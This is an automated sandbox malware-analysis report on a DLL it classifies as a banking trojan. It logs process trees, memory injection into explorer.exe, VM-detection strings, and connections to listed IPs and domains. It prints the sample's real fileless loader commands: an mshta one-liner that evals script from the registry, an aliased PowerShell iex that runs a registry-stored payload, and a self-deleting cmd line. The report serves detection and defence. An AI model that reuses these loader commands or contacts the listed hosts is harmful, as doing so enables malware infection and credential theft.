Source: 7078612.dll Binary or memory string: OriginalFilenameHh5Ese.dll( vs 7078612.dll
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 7078612.dll Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7078612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_SECURITY size: 0xa address: 0x0
Source: 7078612.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7078612.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jt23bwkp.2ng.ps1
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winDLL@27/18@3/5
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D31AB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_050D31AB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{84B29C49-139C-5672-BDF8-F7EA41AC1BBE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{5CDEF802-0BE6-EE03-7550-6F0279841356}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3764:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 7078612.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.633082420.0000000006580000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.626656927.0000000006580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA34C push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA344 push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DA350 push eax; iretd 3_2_050DA351
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050DB352 pushfd ; ret 3_2_050DB361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D825B push ecx; ret 3_2_050D826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D7E70 push ecx; ret 3_2_050D7E79
Source: C:\Windows\System32\control.exe Code function: 24_2_00E7C7BC push edi; iretd 24_2_00E7C7E9
Source: 7078612.dll Static PE information: real checksum: 0x872fe521 should be: 0x8a90a
Source: ogaysol0.dll.19.dr Static PE information: real checksum: 0x0 should be: 0xd29b
Source: bplkxjdz.dll.21.dr Static PE information: real checksum: 0x0 should be: 0x45be
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ogaysol0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\bplkxjdz.dll

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6000 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ogaysol0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bplkxjdz.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9685
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000017.00000000.682082141.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000017.00000000.682491990.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 0000001C.00000002.877330831.0000020727667000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 00000003.00000003.352302871.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.398431744.0000000001099000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.685619999.0000000001099000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000017.00000000.669787220.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: rundll32.exe, 00000003.00000002.684712502.000000000103A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp|
Source: explorer.exe, 00000017.00000000.675091139.0000000005F25000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.41.44.51 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.207.46.124 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: internetcoca.in
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: meganetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.105.103.207 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 62.173.149.9 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: supernetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7B4F912E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 286000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 23F0000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 65130DC000
Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 28C000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 23E0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FFE468F1580
Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFE468F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FFE468F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\explorer.exe base: 23E0000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 286000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 7FFE468F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3320 base: 23F0000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 28C000 value: 00
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 7FFE468F1580 value: EB
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 23E0000 value: 80
Source: C:\Windows\System32\control.exe Memory written: PID: 3320 base: 7FFE468F1580 value: 40
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 5160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3320
Source: C:\Windows\System32\control.exe Thread register set: target process: 3320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 468F1580
Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 468F1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 468F1580
Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>qnma='wscript.shell';resizeto(0,2);eval(new activexobject(qnma).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([system.text.encoding]::ascii.getstring((cyynsofy "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000017.00000000.669708180.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.675019770.00000000056F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000017.00000000.668777721.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000017.00000000.625926261.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.669513558.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.686983756.0000000000B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D5710 cpuid 3_2_050D5710
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D28A7 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep, 3_2_050D28A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D3BEF GetVersionExA,wsprintfA, 3_2_050D3BEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_050D5710 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_050D5710

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.572202912.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTR